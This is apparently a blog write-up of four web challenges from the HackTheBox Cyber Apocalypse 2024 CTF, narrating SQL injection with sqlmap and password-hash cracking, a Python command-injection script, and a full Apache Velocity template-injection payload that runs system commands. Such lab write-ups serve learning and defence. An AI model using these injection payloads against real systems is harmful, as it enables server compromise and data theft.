# HackTheBox Cyber Apocalypse 2024 CTF
## INTRODUCTION
In the realm of cybersecurity challenges, I took part in the HackTheBox Cyber Apocalypse 2024 CTF. Exhausted but determined, I decided to write up my experiences tackling some web challenges. Despite feeling worn out, I wanted to share my journey with others, hoping to shed light on the solutions I discovered amidst the digital chaos.
## WEB
### 1. Flag Command
When we launched our instance, we stumbled upon a webpage featuring a cool web terminal where we could input commands.
Curiosity piqued, I peeked into the **page source** and discovered some **JavaScript files**. I grabbed them using a tool called **wget** and started examining them one by one.
The first file, **main.js**, caught my attention. It was making a **POST** request to an API endpoint called **'api/monitor'** with a payload named **'command'**. Towards the end of the script, I noticed it was fetching additional data by sending a **GET** request to another API endpoint named **'/api/options'**.
Excited to explore further, I decided to send a request to the **'/api/options'** endpoint using a tool called **curl**. To my amazement, it returned a list of commands, possibly meant for use on another endpoint we discovered. One particular command, labeled '**secret**', seemed intriguing.
Without hesitation, I used curl again to send a POST request to the '/api/monitor' endpoint, this time with the command set to **'HEAD NORTH'**. To my delight, it responded with a message congratulating me for escaping death. (Apparently, this challenge was designed as a game where we had to make choices to avoid danger.)
Now, Skipping other options this time i tried sending a request with commad set to the value of secret
And voila! we get the flag and that was the end of our challenge
## 2. KORP Terminal
In this challenge we were required to infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information. Laucnhing the instance we get a webpage with a login,
Trying simple SQL injection payload return an error as JSON which seems the application is suspectable to SQL injection.
I launched burpsuite then intercepted the requests during the login process, and then saved the request to a file **burp.txt** to be used with sqlmap in trying to exploit SQL injection vulnerability.
Then i launched sqlmap.
SQLMap confirmed the application was vulnerable to three SQL injection boolean-based blind, error-based and time-based blind.
I reconstructed the command to enumerate things starting with database then tables and finally dummping the tables.
Tables
Dumping users
The dumped users tables returned encrypted password using Blowfish algorithim(Bcrypt).
It was a time to crack the hashes where our favourite tool johnTheRipper become our option, saving the hash to file then started cracking using john.
Using the obtained username and password to login, we get a page with our flag and that wa the end.
## 3. TimeKORP
Upon launching the instance, we encountered a webpage displaying time in a specific format as shown in the URL. Unlike before, this time we were provided with the source code, prompting us to delve into its details
As we reviewed the source code, we stumbled upon the TimeModel, which seemed to execute commands by passing the $format variable without proper input sanitization. This hinted at a potential vulnerability to command injection.
**OS command injection** is also known as shell injection. It allows an attacker to execute operating system (OS) commands on the server that is running an application, and typically fully compromise the application and its data
Our investigation led us to the TimeController, where we found that the $format variable was extracted from the URL and assigned to a variable named $format.
With the vulnerability identified, our next step was to attempt exploitation. We decided to employ a technique we learned from John Hammound, utilizing a Python script to exploit the command injection vulnerability.
I crafted a Python script to exploit the vulnerability, modifying the $format parameter in the URL to execute commands that list anything matching to "flag".
Upon executing the Python script, we successfully retrieved the flag, demonstrating the effectiveness of the command injection exploit.
```
#!/usr/bin/env python
import requests
url = "http://94.237.54.161:52856/"
r = requests.get(
url,
params = {
"format": "'; ls /flag* #",
},
)
print(r.text)
```
By modifying the Python script to read the flag, we obtained the desired flag, marking the successful completion of the challenge
```
#!/usr/bin/env python
import requests
url = "http://94.237.54.161:52856/"
r = requests.get(
url,
params = {
"format": "'; cat /flag* #",
},
)
print(r.text)
```
## 4. Labyrinth Linguist
In this challenge also we were given an instance and the source code, launching the instance we see a page where we enter a text and it get displayed to a certain format.
Upon reviewing the source code we see it is a java application that uses Apache Velocity template engine. May be this application might be vulnerable to Template Injection.
after paying attention to the source code i noticed the application is vulnerable to template injection.
where there is direct injection of user input into Template, The **readFileToString** method reads a template file and directly inserts the untrusted textString parameter into it using **line = line.replace("TEXT", replacement)**. This means any Velocity template directives within textString will be processed as code when the template is rendered
Upon finding the exploit, i came across with this Linkedin Post that explains about [Apache Velocity Template injection](https://www.linkedin.com/pulse/apache-velocity-server-side-template-injection-marjan-sterjev/)
```
#set($s="")
#set($stringClass=$s.getClass())
#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))
#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))
#set($readerClass=$stringClass.forName("java.io.Reader"))
#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))
#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))
#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))
#set($systemClass=$stringClass.forName("java.lang.System"))
#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())
#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))
#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("<command>"))
#set($null=$process.waitFor() )
#set($inputStream=$process.getInputStream())
#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))
#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))
#set($stringBuilder=$stringBuilderConstructor.newInstance())
#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))
$output
```
so to use this payload i intercept the traffic using burpsuite and start sending request to excute commands.
Trying to list the current directory we see no flag.
Trying the root we see the flag file
Then we were able to read the flag
## CONCLUSION
Feeling a bit fatigued, I managed to solve only a handful of challenges during the HackTheBox Cyber Apocalypse 2024 CTF. I hope my efforts will be forgiven for any mistakes, as I share my solutions for the challenges I tackled.
Sign in with Wallet
Connect another wallet